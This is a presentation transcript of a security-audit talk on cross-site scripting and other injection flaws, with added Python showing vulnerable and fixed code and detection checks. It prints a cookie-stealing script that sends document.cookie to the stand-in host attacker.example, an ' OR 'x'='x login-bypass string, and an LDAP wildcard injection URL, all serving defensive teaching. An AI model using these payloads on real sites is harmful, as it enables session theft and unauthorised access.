Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Presentation transcript:

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz

Business Problem
- Independent security audit
- Regulatory compliance
- XSS issue raised
- Must provide a response

Audit Response
- Either:
  – Prove the issue to be a non-problem, or
  – Describe actions to take

Resolution Steps
- Investigate security concerns
- Restate as IT problem(s)
- Determine solution(s)
- Provide audit response
- Mitigate risk

Investigation
- Define cross-site scripting (XSS)
- Examine how the auditors applied it
- Identify risks
- Research preliminary solutions

cross-site scripting
- Attacker goal: get their code into the victim's browser
- XSS forces a website to execute malicious code in the browser
- The browser user is the intended victim
- Why? Account hijacking, keystroke recording, intranet hacking, theft…

XSS concept

Auditor finding
- Freeform edit box
- Message to Customer Service

XSS types
- Immediate reflection: phishing
- DOM-based: 95 JavaScript methods
- Redirection: header, meta, dynamic
- Multimedia: Flash, QT, PDF scripts
- Cross-Site Request Forgery (CSRF)
- others…
  – (e.g. non-persistent search box)

Risks
- XSS abuses render engines or plug-ins
- Steal browser cookies
- Steal session info for a replay attack
- Malware or bot installation
- Redirect or phishing attempt

Our actual risk
- Currently, none.
- Edit box info is viewed in a thick client
- DHTML or JavaScript needs a browser
- Our thick client is Java Swing-based

Planned Audit Response
- Could indicate "no audit problem"
- Might have future impact
- Address through dev standards
- Consider an application firewall
- Widen problem scope to include all user agent injection tactics

More on Web Attacks
- Cross Site Scripting
- SQL Injection
- XPATH Injection
- LDAP Injection
- SSI (server side inclusion) Injection
- JSP (Java server pages) Injection

Artifacts
- For each injection issue:
  – Vulnerability description documented
  – Preventative coding technique
- Discuss with App Dev teams
  – Publish and socialize direction
  – Include in peer reviews/code walkthroughs
  – Set deadlines for full incorporation
- Communicate with auditors

Cross Site Scripting Example 1
- Trudy posts the following JavaScript on a message board:
  document.location=' bin/ stealcookie.cgi?'+document.cookie
- When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Cross Site Scripting Example 2
- Trudy sends Bob a link to the following URL, which will take him to a personalized page:
  document.location=' bin/stealcookie.cgi?'+document.cookie
- A page is returned that contains the malicious script instead of the username Bob, and Bob's browser executes the script, causing his session cookie to be sent to Trudy
- Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

Cross Site Scripting Detection
- A client usually is not supposed to send scripts to servers
  – If the server receives <SCRIPT>… or the hex equivalent in an incoming packet, and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred
- A sanitized script could look like &lt;SCRIPT>…
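Added example (not from the slides): Python that renders a message-board post the vulnerable way and the HTML-encoded way, and applies the detection rule stated on this slide: a script arriving from the client, decoded from any %XX hex form, that reappears unsanitized in what the server sends back. The sample post, the placeholder host attacker.example and all function names are constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample post: the Example 1 script with the <SCRIPT> wrapper the
# slide omits; attacker.example is a placeholder host, not one from the slides.
STORED_POST = ("<SCRIPT>document.location='http://attacker.example/cgi-bin/"
               "stealcookie.cgi?'+document.cookie</SCRIPT>")
# Constructed: the same post as it arrives URL-encoded ("hex" in the slide).
HEX_POST = ("%3CSCRIPT%3Edocument.location%3D%27http%3A%2F%2Fattacker.example"
            "%2Fcgi-bin%2Fstealcookie.cgi%3F%27%2Bdocument.cookie%3C%2FSCRIPT%3E")

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so a double-encoded %253C is also seen as '<'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_script(inbound: str) -> bool:
    """True if the (decoded) client input carries an opening <script> tag."""
    return SCRIPT_TAG.search(decode_fully(inbound)) is not None


def render_post_unsafe(post: str) -> str:
    """Vulnerable rendering: stored text is pasted into the page as HTML."""
    return "<div class=\"msg\">" + post + "</div>"


def render_post_safe(post: str) -> str:
    """Output encoding: < > & and quotes become entities, so the browser shows
    the text instead of running it (the slide's '&lt;SCRIPT>...' form)."""
    return "<div class=\"msg\">" + html.escape(post, quote=True) + "</div>"


def xss_occurred(inbound_param: str, outbound_body: str) -> bool:
    """The slide's rule: a script arrived from the client and the same script
    left the server unsanitized."""
    decoded = decode_fully(inbound_param)
    match = SCRIPT_TAG.search(decoded)
    if match is None:
        return False
    return decoded[match.start():] in outbound_body


if __name__ == "__main__":
    print(render_post_safe(STORED_POST))
    print("unsafe page leaks script:",
          xss_occurred(HEX_POST, render_post_unsafe(STORED_POST)))
    print("encoded page leaks script:",
          xss_occurred(HEX_POST, render_post_safe(STORED_POST)))
```

The decode loop matters for the "hex equivalent" point on the slide: a check that only looks at the raw bytes misses %3CSCRIPT%3E, and a single decode misses a double-encoded %253C.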

SQL Injection Example
- Trudy accesses Bob's website, which does not validate input on its sign-in form
  – Runs a SQL statement like the following:
  – SELECT * from Accounts where username = "USER_NAME" and password = "USER_PASS";
- In the password field, she types as her password:
  – X" OR "x"="x
- Manipulates the server into running the following SQL command:
  – SELECT * from Accounts where username = "USER_NAME" and password="X" OR "x"="x";
  – Selects all account information

SQL Injection Detection
- To detect and prevent this at Bob's location:
  – Log any traffic from Trudy to Bob containing form data that contains a quotation mark
  – Match any outgoing SQL statements from Bob's web server to his database server and verify that the quotation marks Trudy supplied were escaped
  – If they weren't, take action
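Added example (not from the slides): the sign-in query from the previous slide built by string concatenation next to its parameterised form, run against a constructed in-memory SQLite table, plus the detection rule from this slide applied to the outbound statement. The payload is written with single quotes (standard SQL string literals) rather than the slide's double quotes, because SQLite reads double-quoted strings as identifiers first; the table contents and function names are constructed.

```python
import sqlite3

# Constructed payload, the slide's X" OR "x"="x written with single quotes.
PAYLOAD = "X' OR 'x'='x"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory Accounts table standing in for Bob's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Accounts (username TEXT, password TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO Accounts VALUES (?, ?, ?)",
                     [("bob", "s3cret", 100), ("alice", "hunter2", 250)])
    return conn


def build_unsafe_sql(username: str, password: str) -> str:
    """The 'before': user input concatenated straight into the statement."""
    return ("SELECT * FROM Accounts WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_unsafe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Runs the concatenated statement; AND binds tighter than OR, so the
    injected OR 'x'='x' makes every row match."""
    return conn.execute(build_unsafe_sql(username, password)).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterised query: the driver sends the values separately, so a quote
    in the password is data, never SQL."""
    return conn.execute(
        "SELECT * FROM Accounts WHERE username = ? AND password = ?",
        (username, password)).fetchall()


def supplied_quotes_escaped(statement: str, supplied: str) -> bool:
    """The slide's outbound check: a quote that came from the client must not
    reach the database unescaped (a doubled '' is the escaped form)."""
    if "'" not in supplied:
        return True
    return supplied not in statement


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_unsafe(db, "bob", PAYLOAD))
    print("parameterised:", login_safe(db, "bob", PAYLOAD))
    print("quotes escaped on the wire:",
          supplied_quotes_escaped(build_unsafe_sql("bob", PAYLOAD), PAYLOAD))
```

The outbound check is what a network-level monitor can do when it cannot change the application; the parameterised query is the fix the development standards should require, since with it the client's quote never appears in the statement at all.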

XPATH Injection Example
- Similar to SQL injection
- Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query:
  – string(//user[name/text()='USER_NAME' and password/text()='USER_PASS']/account/text())
- Trudy again can provide the following password to change the statement's logic:
  – X' OR 'x'='x
  – The statement thus selects the first account
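Added example (not from the slides): XPath 1.0 has no escape character inside a string literal, so the usual fix is to build the literal with whichever quote kind the value does not contain and fall back to concat() when it contains both. The code below applies that to the query on this slide; the function names are constructed for this example.

```python
def xpath_literal(value: str) -> str:
    """Turn an untrusted string into an XPath 1.0 string literal. A value
    holding both ' and " is assembled piecewise with concat()."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in pieces) + ")"


def build_query_unsafe(user_name: str, user_pass: str) -> str:
    """The slide's query with the values pasted in: the 'before'."""
    return ("string(//user[name/text()='" + user_name +
            "' and password/text()='" + user_pass + "']/account/text())")


def build_query(user_name: str, user_pass: str) -> str:
    """Same query with each value wrapped as a proper literal, so a quote in
    the password stays inside the string instead of ending it."""
    return ("string(//user[name/text()=" + xpath_literal(user_name) +
            " and password/text()=" + xpath_literal(user_pass) +
            "]/account/text())")


if __name__ == "__main__":
    payload = "X' OR 'x'='x"   # the password from the slide
    print(build_query_unsafe("bob", payload))
    print(build_query("bob", payload))
```

In the safe form the payload becomes the literal "X' OR 'x'='x" (double-quoted), which the XPath engine compares as one string against password/text().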

LDAP Injection Example
- Server using LDAP for authentication
  – User name initialized, but then unchecked user input is used to create a query:
    filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
- Attacker can exploit this using special characters:
  http://example/ldapsearch.asp?user=*

LDAP Injection Detection
- Detection is based on usage of special LDAP characters
  – System monitors input for special characters
  – Either scrubs incoming input or watches for unescaped output passed to the directory server
- Detection approach is blackbox
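Added example (not from the slides): a Python version of the filter line from the LDAP slide, once unchecked and once with the value escaped per RFC 4515 section 3 (the characters * ( ) \ and NUL written as \XX hex escapes), plus the input monitor this slide describes, run over the slide's example URL. Function names are constructed for this example.

```python
from urllib.parse import parse_qs, urlsplit

# RFC 4515 section 3: characters that may not appear raw inside a filter value.
LDAP_SPECIALS = "*()\\\x00"


def escape_ldap_filter_value(value: str) -> str:
    """Write each special character as a \\XX hex escape so the directory
    matches it literally instead of treating it as a wildcard or syntax."""
    return "".join("\\%02x" % ord(ch) if ch in LDAP_SPECIALS else ch
                   for ch in value)


def build_uid_filter_unsafe(user_name: str) -> str:
    """The slide's ASP line, unchecked: (uid=" + userName + ")."""
    return "(uid=" + user_name + ")"


def build_uid_filter(user_name: str) -> str:
    """Same filter with the value escaped before it is spliced in."""
    return "(uid=" + escape_ldap_filter_value(user_name) + ")"


def flag_ldap_specials(url: str) -> list:
    """Slide's detection: list (name, value) request parameters that carry an
    LDAP special character."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [(name, v) for name, values in params.items() for v in values
            if any(ch in LDAP_SPECIALS for ch in v)]


if __name__ == "__main__":
    url = "http://example/ldapsearch.asp?user=*"   # from the slide
    print("flagged:", flag_ldap_specials(url))
    print("unchecked:", build_uid_filter_unsafe("*"))
    print("escaped:", build_uid_filter("*"))
```

With the escape in place the request user=* produces (uid=\2a), a search for a literal asterisk, rather than a wildcard match on every entry.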

SSI Injection Example
- Bob has his server configured to use Server-Side Includes
- Trudy passes input with an SSI embedded
- The SSI inserts malicious code into normal webpages upon the next request
- Future legitimate users get content containing the tainted code included by the SSI

SSI Injection Detection
- Bob's system needs SSI enabled, so he uses our system on local servers
  – SSI code can be detected by its specific format
- HTML comment (<!-- -->) containing a command
  – SSI commands can be stripped on ingress
  – Can also deny outgoing packets that do not include the SSI as it was inputted (which means successful execution)
- Detection approach is blackbox
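Added example (not from the slides): the three checks on this slide in Python: recognising the SSI directive format (an HTML comment whose body starts with # and a command), stripping directives on ingress, and the egress rule that a directive which went in but does not come back verbatim was expanded by the server. The sample input uses the harmless echo directive and is constructed; function names are constructed too.

```python
import re

# An SSI directive is an HTML comment whose body starts with '#' and a
# command name, e.g. <!--#echo var="DATE_LOCAL" -->.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(\w+)\b.*?-->", re.DOTALL)

# Constructed sample input with a directive embedded in ordinary text.
SAMPLE_INPUT = 'Please update my address. <!--#echo var="DATE_LOCAL" --> Thanks'


def find_ssi_directives(text: str) -> list:
    """Return the command name of every SSI directive found in text."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(text)]


def strip_ssi(text: str) -> str:
    """Ingress scrubbing: remove the directives, keep the surrounding text."""
    return SSI_DIRECTIVE.sub("", text)


def ssi_executed(inbound: str, outbound: str) -> bool:
    """Egress rule from the slide: a directive that arrived in the input but
    is absent from the response was expanded by the server, so it executed."""
    directives = [m.group(0) for m in SSI_DIRECTIVE.finditer(inbound)]
    return any(d not in outbound for d in directives)


if __name__ == "__main__":
    print("directives:", find_ssi_directives(SAMPLE_INPUT))
    print("scrubbed:", strip_ssi(SAMPLE_INPUT))
    # A response where the server replaced the directive with a date.
    print("executed:", ssi_executed(SAMPLE_INPUT,
                                    "Please update my address. Thursday Thanks"))
```

A plain HTML comment without the leading # is not matched, so ordinary comments in user text are left alone.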

JSP Injection Example
- Similar to SSI injection
- Bob has a portal server configured to use dynamic code for templates
- Trudy passes input with an embedded
- Malicious code is inserted into the webpage

JSP Injection Prevention
- Prefer static include
- Don't allow file inclusion outside of the server via Java2 Security policies
- Firewall rules to prevent outbound requests from the server
- Input validation coding
- Choose portal software not requiring dynamic includes or code execution

Defense Approaches
- Web firewall/IDS
  – ModSecurity for Apache
  – Commercial: SecureSphere from Imperva
- Static code analysis
  – Open source: Nikto
  – Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
- Education on good coding
  – HTML encoding on input (server-side)
  – Input validation/filtering

Q&A
- Suggestions?

Backup Slides

user agent injection
- Stored
- HTTP Response Splitting
- SQL Injection
- XML Injection
- JSP Code Injection
- LDAP Injection

Approaches
- Application firewall
- HTML encoding on input (server-side)
- Input validation/filtering
- Coding techniques with output
- Session key enforced to prevent CSRF

XPATH Injection Detection
- Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries
- Correction can again be done by escaping any rogue quotation marks Trudy may have inserted
- Detection approach is blackbox